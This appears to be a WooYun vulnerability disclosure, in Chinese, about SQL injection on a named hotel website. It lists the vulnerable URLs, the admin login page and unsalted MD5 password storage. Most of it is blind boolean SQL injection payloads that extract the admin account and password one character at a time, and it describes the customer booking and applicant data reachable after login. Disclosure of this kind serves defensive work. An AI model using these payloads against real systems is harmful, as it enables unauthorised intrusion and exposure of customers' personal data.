WooYun.org

手动注入的。
注入地点：
http://www.gzdynasty.com/content.asp?id=21 （这里）
http://www.gzdynasty.com/New_list.asp?id=156 （还有这里）等。
后台登陆地址：
http://www.gzdynasty.com/manage/login.asp
数据库中的密码虽然是hash后存储的，但hash算法为MD5，目前网上有很多MD5的破解网站可对MD5的加密信息进行“逆运算”，因此很容易就可以获得密码的明文。
登陆后台后可直接看到客户订房，应聘人资料等敏感信息。此外，还可直接对用户权限和网站内容等进行操作！
注入的SQL内容：
判断是否存在帐号字段：
and (Select Count(帐号字段) from Admin)>=0
判断是否存在密码字段：
and (Select Count(密码字段) from Admin)>=0
判断Admin表中第一条记录的帐号字段长度：
and (select top 1 len(帐号字段) from Admin)>=0
and (select top 1 len(帐号字段) from Admin)>=1
……
手工破解管理员帐号
and (select top 1 asc(mid(帐号字段,1,1)) from Admin)>=97
and (select top 1 asc(mid(帐号字段,2,1)) from Admin)>=100
……
判断Admin表中第一条记录的密码字段长度：
and (select top 1 len(密码字段) from Admin where 帐号字段 = "破解出的帐号字段的值")>=0
and (select top 1 len(密码字段) from Admin where 帐号字段 = "破解出的帐号字段的值")>=1
……
手工破解管理员密码
and (select top 1 asc(mid(密码字段,1,1)) from Admin where 帐号字段 = "破解出的帐号字段的值")>=52
and (select top 1 asc(mid(密码字段,2,1)) from Admin where 帐号字段 = "破解出的帐号字段的值")>=52
……
附图：
尝试看User表是否存在（不存在）：

尝试看Admin表是否存在（存在）：

获得管理员帐号密码后可登陆到后台：

可看到客户订房信息等：

可添加修改管理员权限：

可修改网站内容（如新闻、网站资料等）：